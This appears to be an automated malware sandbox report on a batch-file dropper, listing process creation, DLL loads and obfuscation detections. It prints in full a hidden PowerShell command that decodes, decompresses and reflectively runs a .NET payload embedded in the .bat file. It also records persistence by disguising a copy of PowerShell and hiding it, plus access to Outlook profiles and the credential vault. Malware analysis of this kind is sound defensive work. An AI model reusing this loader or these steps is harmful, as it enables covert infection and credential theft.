                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf C:\Users\user\Desktop\ilZhNx3JAc.bat.Dmf -WindowStyle hidden -command "$Ddjudzf = get-content 'C:\Users\user\Desktop\ilZhNx3JAc.bat' | Select-Object -Last 1; $Qttfylkd = [System.Convert]::FromBase64String($Ddjudzf);$Cohunv = New-Object System.IO.MemoryStream( , $Qttfylkd );$Wepcwpnqbxa = New-Object System.IO.MemoryStream;$Xtcusn = New-Object System.IO.Compression.GzipStream $Cohunv, ([IO.Compression.CompressionMode]::Decompress);$Xtcusn.CopyTo( $Wepcwpnqbxa );$Xtcusn.Close();$Cohunv.Close();[byte[]] $Qttfylkd = $Wepcwpnqbxa.ToArray();[Array]::Reverse($Qttfylkd); $Arcfhlmphge = [System.AppDomain]::CurrentDomain.Load($Qttfylkd); $Cqife = $Arcfhlmphge.EntryPoint; $Cqife.DeclaringType.InvokeMember($Cqife.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null"Jump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\MustFlush.bat" "Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F "Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\xcopy.exe xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\AppData\Roaming\MustFlush.bat.DmfJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\AppData\Roaming\MustFlush.bat.DmfJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf C:\Users\user\AppData\Roaming\MustFlush.bat.Dmf -WindowStyle hidden -command "$Ddjudzf = get-content 'C:\Users\user\AppData\Roaming\MustFlush.bat' | Select-Object -Last 1; $Qttfylkd = [System.Convert]::FromBase64String($Ddjudzf);$Cohunv = New-Object System.IO.MemoryStream( , $Qttfylkd );$Wepcwpnqbxa = New-Object System.IO.MemoryStream;$Xtcusn = New-Object System.IO.Compression.GzipStream $Cohunv, ([IO.Compression.CompressionMode]::Decompress);$Xtcusn.CopyTo( $Wepcwpnqbxa );$Xtcusn.Close();$Cohunv.Close();[byte[]] $Qttfylkd = $Wepcwpnqbxa.ToArray();[Array]::Reverse($Qttfylkd); $Arcfhlmphge = [System.AppDomain]::CurrentDomain.Load($Qttfylkd); $Cqife = $Arcfhlmphge.EntryPoint; $Cqife.DeclaringType.InvokeMember($Cqife.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)| Out-Null"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                    Source: C:\Windows\System32\xcopy.exeSection loaded: ulib.dllJump to behavior
                    Source: C:\Windows\System32\xcopy.exeSection loaded: ifsutil.dllJump to behavior
                    Source: C:\Windows\System32\xcopy.exeSection loaded: devobj.dllJump to behavior
                    Source: C:\Windows\System32\xcopy.exeSection loaded: fsutilext.dllJump to behavior
                    Source: C:\Windows\System32\xcopy.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
                    Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfSection loaded: atl.dllJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfSection loaded: msisip.dllJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfSection loaded: wshext.dllJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfSection loaded: appxsip.dllJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfSection loaded: opcservices.dllJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                    Source: C:\Windows\System32\xcopy.exeSection loaded: ulib.dllJump to behavior
                    Source: C:\Windows\System32\xcopy.exeSection loaded: ifsutil.dllJump to behavior
                    Source: C:\Windows\System32\xcopy.exeSection loaded: devobj.dllJump to behavior
                    Source: C:\Windows\System32\xcopy.exeSection loaded: fsutilext.dllJump to behavior
                    Source: C:\Windows\System32\xcopy.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
                    Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfSection loaded: atl.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfSection loaded: msisip.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfSection loaded: wshext.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfSection loaded: appxsip.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfSection loaded: opcservices.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MustFlush.bat.DmfSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\ilZhNx3JAc.bat.DmfFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: ilZhNx3JAc.batStatic file information: File size 1411997 > 1048576
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1406826656.0000000008BE0000.00000004.08000000.00040000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.000000000644C000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.00000000064EF000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1366787464.0000000004BC9000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1517946199.0000000004D7C000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.00000000064E5000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1406826656.0000000008BE0000.00000004.08000000.00040000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.000000000644C000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.00000000064EF000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1366787464.0000000004BC9000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1517946199.0000000004D7C000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.00000000064E5000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: powershell.pdbUGP source: ilZhNx3JAc.bat.Dmf, 00000007.00000000.1342976711.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, MustFlush.bat.Dmf, 00000010.00000000.1476708624.0000000000CA8000.00000020.00000001.01000000.0000000B.sdmp, MustFlush.bat.Dmf.14.dr, ilZhNx3JAc.bat.Dmf.5.dr
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.00000000063DF000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1406564068.0000000008B90000.00000004.08000000.00040000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000006477000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000005E02000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.00000000063DF000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1377092507.0000000005E54000.00000004.00000800.00020000.00000000.sdmp, ilZhNx3JAc.bat.Dmf, 00000007.00000002.1406564068.0000000008B90000.00000004.08000000.00040000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000006477000.00000004.00000800.00020000.00000000.sdmp, MustFlush.bat.Dmf, 00000010.00000002.1547502534.0000000005E02000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: powershell.pdb source: ilZhNx3JAc.bat.Dmf, 00000007.00000000.1342976711.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, MustFlush.bat.Dmf, 00000010.00000000.1476708624.0000000000CA8000.00000020.00000001.01000000.0000000B.sdmp, MustFlush.bat.Dmf.14.dr, ilZhNx3JAc.bat.Dmf.5.dr

                    Data Obfuscation

                    barindex
                    .NET source code contains method to dynamically call methods (often used by packers)
                    Source: 7.2.ilZhNx3JAc.bat.Dmf.612aca0.8.raw.unpack, I7DiZmuDr9s6wMO6NpB.cs.Net Code: Type.GetTypeFromHandle(saEpX2tOaZ3MHMPHSgw.MDJJTBhW8W(16777347)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(saEpX2tOaZ3MHMPHSgw.MDJJTBhW8W(16777252)),Type.GetTypeFromHandle(saEpX2tOaZ3MHMPHSgw.MDJJTBhW8W(16777284))})
                    .NET source code contains potential unpacker
                    Source: 7.2.ilZhNx3JAc.bat.Dmf.64ef608.7.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 7.2.ilZhNx3JAc.bat.Dmf.64ef608.7.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 7.2.ilZhNx3JAc.bat.Dmf.64ef608.7.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                    Source: 7.2.ilZhNx3JAc.bat.Dmf.8000000.9.raw.unpack, FieldBridgeMapper.cs.Net Code: PostRegistry System.Reflection.Assembly.Load(byte[])
                    Source: 7.2.ilZhNx3JAc.bat.Dmf.8b90000.12.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                    Source: 7.2.ilZhNx3JAc.bat.Dmf.8b90000.12.raw.unpack, ListDecorator.cs.Net Code: Read
                    Source: 7.2.ilZhNx3JAc.bat.Dmf.8b90000.12.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                    Source: 7.2.ilZhNx3JAc.bat.Dmf.8b90000.12.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                    Source: 7.2.ilZhNx3JAc.bat.Dmf.8b90000.12.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                    Yara detected Costura Assembly Loader
                    Source: Yara matchFile source: 7.2.ilZhNx3JAc.bat.Dmf.8ac0000.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.ilZhNx3JAc.bat.Dmf.612aca0.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.ilZhNx3JAc.bat.Dmf.6038a80.4.raw.unpack, type: UNPACKEDPE
